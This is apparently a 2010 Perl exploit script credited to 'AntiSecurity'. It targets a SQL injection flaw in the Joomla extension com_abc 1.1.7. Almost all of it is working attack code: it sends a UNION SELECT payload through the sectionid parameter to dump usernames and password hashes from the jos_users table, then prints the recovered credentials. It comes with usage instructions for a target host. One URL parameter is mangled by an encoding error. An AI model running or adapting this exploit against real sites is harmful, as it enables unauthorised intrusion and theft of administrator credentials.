#!/usr/bin/perl
#***********************************************************************#
# #
# [o] ABC Joomla Extension SQL Injection Exploit#
#Software : com_abc version 1.1.7 #
#Vendor : http://www.airiny.com/#
#Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] #
#Contact: public[at]antisecurity[dot]org#
#Home : http://antisecurity.org/#
# #
# [o] Usage #
#root@evilc0de:~# perl abc.pl www.target.com#
# #
# [o] Greetz#
#Angela Zhang stardustmemory aJe martfella pizzyroot Genex#
#H312Y yooogy mousekill }^-^{ noname matthews wishnusakti #
#skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 #
# #
# [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia #
# #
#***********************************************************************#
use HTTP::Request;
use LWP::UserAgent;
my $target = $ARGV[0];
my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS§ionid=';
my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--';
print "\n[x]===============================================[x]\n";
print "[x]ABC Joomla Extension SQL Injection Exploit [x]\n";
print "[x][C]oded By AntiSecurity[x]\n";
print "[x]===============================================[x]\n\n";
my $exploit = "http://".$target.$file_vuln.$sql_query;
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response= $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }